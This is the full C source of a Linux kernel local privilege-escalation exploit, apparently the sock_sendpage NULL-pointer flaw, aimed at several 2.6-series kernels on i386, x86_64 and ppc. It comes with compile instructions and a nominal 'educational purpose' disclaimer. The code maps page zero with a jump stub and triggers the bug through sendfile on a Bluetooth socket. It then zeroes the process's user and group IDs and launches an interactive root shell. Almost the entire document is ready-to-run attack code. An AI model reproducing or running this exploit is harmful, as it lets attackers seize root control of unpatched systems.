* Linux 2.6.18-128.el5 * Linux 2.6.9-89.EL * Ubuntu 8.10 Linux 2.6.27 *

1. * Linux 2.6.18-128.el5
2. * Linux 2.6.9-89.EL
3. * Ubuntu 8.10 Linux 2.6.27
4. *
5. * For i386 & ppc compile with the command;
6. * gcc -w -o exploit exploit.c
7. *
8. * For x86_64 kernel and ppc64 Compile as;
9. * gcc -w -m64 -o exploit exploit.c
10. *
11. * Greetz: r0073r,r4dc0re,side^effect
12. *
13. *
14. * For Educational purpose Only))
15. */
16.  
17. #include <stdio.h>
18. #include <stdlib.h>
19. #include <string.h>
20. #include <sys/mman.h>
21. #include <sys/sendfile.h>
22. #include <sys/types.h>
23. #include <sys/socket.h>
24. #include <unistd.h>
25.  
26. #if !defined(__always_inline)
27. #define __always_inline inline __attribute__((always_inline))
28. #endif
29.  
30. #if defined(__i386__) || defined(__x86_64__)
31. #if defined(__LP64__)
32. static __always_inline unsigned long
33. current_stack_pointer(void)
34. {
35. unsigned long sp;
36.  
37. asm volatile ("movq %%rsp,%0; " : "=r" (sp));
38.  
39. return sp;
40. }
41.  
42. #else
43. static __always_inline unsigned long
44. current_stack_pointer(void)
45. {
46. unsigned long sp;
47.  
48. asm volatile ("movl %%esp,%0" : "=r" (sp));
49.  
50. return sp;
51. }
52.  
53. #endif
54.  
55. #elif defined(__powerpc__) || defined(__powerpc64__)
56. static __always_inline unsigned long
57. current_stack_pointer(void)
58. {
59. unsigned long sp;
60.  
61. asm volatile ("mr %0,%%r1; " : "=r" (sp));
62.  
63. return sp;
64. }
65.  
66. #endif
67.  
68. #if defined(__i386__) || defined(__x86_64__)
69. #if defined(__LP64__)
70. static __always_inline unsigned long
71. current_task_struct(void)
72. {
73. unsigned long task_struct;
74.  
75. asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
76.  
77. return task_struct;
78. }
79.  
80. #else
81. #define TASK_RUNNING 0
82.  
83. static __always_inline unsigned long
84. current_task_struct(void)
85. {
86. unsigned long task_struct, thread_info;
87.  
88. thread_info = current_stack_pointer() & ~(4096 - 1);
89.  
90. if (*(unsigned long *)thread_info >= 0xc0000000) {
91. task_struct = *(unsigned long *)thread_info;
92.  
93. /*
94. * The TASK_RUNNING is the Only poss1ble sta7e for a proCes5 exEcut1ng
95. * in us3r-spaCe.
96. */
97. if (*(unsigned long *)task_struct == TASK_RUNNING)
98. return task_struct;
99. }
100.  
101. /*
102. * Prior to the 2.6 kernel series, the task_struct was stored at the end
103. * of the kernel stack.
104. */
105. task_struct = current_stack_pointer() & ~(8192 - 1);
106.  
107. if (*(unsigned long *)task_struct == TASK_RUNNING)
108. return task_struct;
109.  
110. thread_info = task_struct;
111.  
112. task_struct = *(unsigned long *)thread_info;
113.  
114. if (*(unsigned long *)task_struct == TASK_RUNNING)
115. return task_struct;
116.  
117. return -1;
118. }
119.  
120. #endif
121.  
122. #elif defined(__powerpc__) || defined(__powerpc64__)
123. #define TASK_RUNNING 0
124.  
125. static __always_inline unsigned long
126. current_task_struct(void)
127. {
128. unsigned long task_struct, thread_info;
129.  
130. #if defined(__LP64__)
131. task_struct = current_stack_pointer() & ~(16384 - 1);
132.  
133. #else
134. task_struct = current_stack_pointer() & ~(8192 - 1);
135.  
136. #endif
137.  
138. if (*(unsigned long *)task_struct == TASK_RUNNING)
139. return task_struct;
140.  
141. thread_info = task_struct;
142.  
143. task_struct = *(unsigned long *)thread_info;
144.  
145. if (*(unsigned long *)task_struct == TASK_RUNNING)
146. return task_struct;
147.  
148. return -1;
149. }
150.  
151. #endif
152.  
153. #if defined(__i386__) || defined(__x86_64__)
154. static unsigned long uid, gid;
155.  
156. static int
157. change_cred(void)
158. {
159. unsigned int *task_struct;
160.  
161. task_struct = (unsigned int *)current_task_struct();
162.  
163. while (task_struct) {
164. if (task_struct[0] == uid && task_struct[1] == uid &&
165. task_struct[2] == uid && task_struct[3] == uid &&
166. task_struct[4] == gid && task_struct[5] == gid &&
167. task_struct[6] == gid && task_struct[7] == gid) {
168. task_struct[0] = task_struct[1] =
169. task_struct[2] = task_struct[3] =
170. task_struct[4] = task_struct[5] =
171. task_struct[6] = task_struct[7] = 0;
172. break;
173. }
174.  
175. task_struct++;
176. }
177.  
178. return -1;
179. }
180.  
181. #elif defined(__powerpc__) || defined(__powerpc64__)
182. static int
183. change_cred(void)
184. {
185. unsigned int *task_struct;
186.  
187. task_struct = (unsigned int *)current_task_struct();
188.  
189. while (task_struct) {
190. if (!task_struct[0]) {
191. task_struct++;
192. continue;
193. }
194.  
195. if (task_struct[0] == task_struct[1] &&
196. task_struct[0] == task_struct[2] &&
197. task_struct[0] == task_struct[3] &&
198. task_struct[4] == task_struct[5] &&
199. task_struct[4] == task_struct[6] &&
200. task_struct[4] == task_struct[7]) {
201. task_struct[0] = task_struct[1] =
202. task_struct[2] = task_struct[3] =
203. task_struct[4] = task_struct[5] =
204. task_struct[6] = task_struct[7] = 0;
205. break;
206. }
207.  
208. task_struct++;
209. }
210.  
211. return -1;
212. }
213.  
214. #endif
215.  
216. #define PAGE_SIZE getpagesize()
217.  
218. int
219. main(void)
220. {
221. char *addr;
222. int out_fd, in_fd;
223. char template[] = "/tmp/tmp.XXXXXX";
224.  
225. #if defined(__i386__) || defined(__x86_64__)
226. uid = getuid(), gid = getgid();
227.  
228. #endif
229.  
230. if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
231. MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
232. perror("mmap");
233. exit(EXIT_FAILURE);
234. }
235.  
236. #if defined(__i386__) || defined(__x86_64__)
237. #if defined(__LP64__)
238. addr[0] = '\xff';
239. addr[1] = '\x24';
240. addr[2] = '\x25';
241. *(unsigned long *)&addr[3] = 8;
242. *(unsigned long *)&addr[8] = (unsigned long)change_cred;
243.  
244. #else
245. addr[0] = '\xff';
246. addr[1] = '\x25';
247. *(unsigned long *)&addr[2] = 8;
248. *(unsigned long *)&addr[8] = (unsigned long)change_cred;
249.  
250. #endif
251.  
252. #elif defined(__powerpc__) || defined(__powerpc64__)
253. #if defined(__LP64__)
254. /*
255. * The use of function descriptors by the Power 64-bit ELF ABI requires
256. * the use of a fake function descriptor.:P
257. */
258. *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
259.  
260. #else
261. addr[0] = '\x3f';
262. addr[1] = '\xe0';
263. *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
264. addr[4] = '\x63';
265. addr[5] = '\xff';
266. *(unsigned short *)&addr[6] = (unsigned short)change_cred;
267. addr[8] = '\x7f';
268. addr[9] = '\xe9';
269. addr[10] = '\x03';
270. addr[11] = '\xa6';
271. addr[12] = '\x4e';
272. addr[13] = '\x80';
273. addr[14] = '\x04';
274. addr[15] = '\x20';
275.  
276. #endif
277.  
278. #endif
279.  
280. if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
281. perror("socket");
282. exit(EXIT_FAILURE);
283. }
284.  
285. if ((in_fd = mkstemp(template)) == -1) {
286. perror("mkstemp");
287. exit(EXIT_FAILURE);
288. }
289.  
290. if(unlink(template) == -1) {
291. perror("unlink");
292. exit(EXIT_FAILURE);
293. }
294.  
295. if (ftruncate(in_fd, PAGE_SIZE) == -1) {
296. perror("ftruncate");
297. exit(EXIT_FAILURE);
298. }
299.  
300. sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
301.  
302. execl("/bin/sh", "sh", "-i", NULL);
303.  
304. exit(EXIT_SUCCESS);
305. }
306.  
307.  
308. # [2011-10-07]
309.